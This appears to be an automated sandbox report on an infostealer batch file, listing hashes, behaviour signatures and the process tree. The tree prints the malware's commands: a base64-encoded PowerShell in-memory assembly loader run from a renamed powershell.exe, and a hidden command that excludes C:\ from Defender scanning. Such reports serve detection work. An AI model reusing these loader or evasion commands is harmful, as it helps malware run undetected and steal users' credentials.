Analysis

  • max time kernel
    6s
  • max time network
    8s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/09/2023, 16:50

General

  • Target

    f9d4d72bd272a4c2d5a84f7ce2dbe3cf5d041de49a87560252ea1cd40ee5edab.bat

  • Size

    942KB

  • MD5

    4952568d9c4001507f1dddb00ecab840

  • SHA1

    dc8a47073962efe91fb965db992c84d401da391b

  • SHA256

    f9d4d72bd272a4c2d5a84f7ce2dbe3cf5d041de49a87560252ea1cd40ee5edab

  • SHA512

    a5b2006e97e693ff47fda30859003a6565f039f83ebf4c1e9485221e14bb0cad1b3f668f6961b95e811bf0fc482b047ad021a5536d856304a6cf99478c5f566f

  • SSDEEP

    24576:i7jIEkrDvmeLFsPXmK9IwHl1oCGG5SXCzi3Ij+kz:i7qU2KdHdt9

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f9d4d72bd272a4c2d5a84f7ce2dbe3cf5d041de49a87560252ea1cd40ee5edab.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\f9d4d72bd272a4c2d5a84f7ce2dbe3cf5d041de49a87560252ea1cd40ee5edab.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        3⤵
          PID:60
        • C:\Windows\system32\xcopy.exe
          xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Gxypmmj.png
          3⤵
            PID:2152
          • C:\Windows\system32\xcopy.exe
            xcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\f9d4d72bd272a4c2d5a84f7ce2dbe3cf5d041de49a87560252ea1cd40ee5edab.bat C:\Users\Admin\AppData\Local\Temp\Gxypmmj.png.bat
            3⤵
              PID:4228
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo F "
              3⤵
                PID:1252
              • C:\Users\Admin\AppData\Local\Temp\Gxypmmj.png
                C:\Users\Admin\AppData\Local\Temp\Gxypmmj.png -win 1 -enc JABFAGsAZgBjAHIAeQBjAGwAcgAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABMAGkAbgBlAHMAKAAoACgAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgAuAGIAYQB0ACIAKQAsACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBsAGEAcwB0ACAAMQA7ACAAJABOAHMAagBwAGwAaABiAHgAYgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEUAawBmAGMAcgB5AGMAbAByACkAOwAkAE0AYgBoAHIAZAB3AHMAdABrACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABOAHMAagBwAGwAaABiAHgAYgB5ACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFYAdgB2AGQAaABvAGMAYgB0AHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQATQBiAGgAcgBkAHcAcwB0AGsALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFYAdgB2AGQAaABvAGMAYgB0AHIALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFYAdgB2AGQAaABvAGMAYgB0AHIALgBDAGwAbwBzAGUAKAApADsAJABNAGIAaAByAGQAdwBzAHQAawAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE4AcwBqAHAAbABoAGIAeABiAHkAIAA9ACAAJABvAHUAdABwAHUAdAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATgBzAGoAcABsAGgAYgB4AGIAeQApADsAIAAkAEwAZQB5AG8AYQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABOAHMAagBwAGwAaABiAHgAYgB5ACkAOwAgACQAUgBhAG8AcAB4AGUAIAA9ACAAJABMAGUAeQBvAGEALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABQAGUAbAB4AGsAeAB3AHEAcwB2AG4AIAA9ACAAJABSAGEAbwBwAHgAZQAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:4300
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
            1⤵
              PID:2004

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\Gxypmmj.png

                    Filesize

                    442KB

                    MD5

                    04029e121a0cfa5991749937dd22a1d9

                    SHA1

                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                    SHA256

                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                    SHA512

                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                  • C:\Users\Admin\AppData\Local\Temp\Gxypmmj.png.bat

                    Filesize

                    942KB

                    MD5

                    4952568d9c4001507f1dddb00ecab840

                    SHA1

                    dc8a47073962efe91fb965db992c84d401da391b

                    SHA256

                    f9d4d72bd272a4c2d5a84f7ce2dbe3cf5d041de49a87560252ea1cd40ee5edab

                    SHA512

                    a5b2006e97e693ff47fda30859003a6565f039f83ebf4c1e9485221e14bb0cad1b3f668f6961b95e811bf0fc482b047ad021a5536d856304a6cf99478c5f566f

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvoapmvl.nq0.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • memory/4300-8-0x0000025AA9FA0000-0x0000025AA9FC2000-memory.dmp

                    Filesize

                    136KB

                  • memory/4300-18-0x00007FF874FB0000-0x00007FF875A71000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4300-19-0x0000025AC25B0000-0x0000025AC25C0000-memory.dmp

                    Filesize

                    64KB

                  • memory/4300-21-0x0000025AC25B0000-0x0000025AC25C0000-memory.dmp

                    Filesize

                    64KB

                  • memory/4300-23-0x0000025AC4E10000-0x0000025AC4E55000-memory.dmp

                    Filesize

                    276KB

                  • memory/4300-24-0x0000025AC25B0000-0x0000025AC25C0000-memory.dmp

                    Filesize

                    64KB

                  • memory/4300-25-0x0000025AC25B0000-0x0000025AC25C0000-memory.dmp

                    Filesize

                    64KB

                  • memory/4300-26-0x0000025AC4F80000-0x0000025AC4FD0000-memory.dmp

                    Filesize

                    320KB

                  • memory/4300-27-0x00007FF874FB0000-0x00007FF875A71000-memory.dmp

                    Filesize

                    10.8MB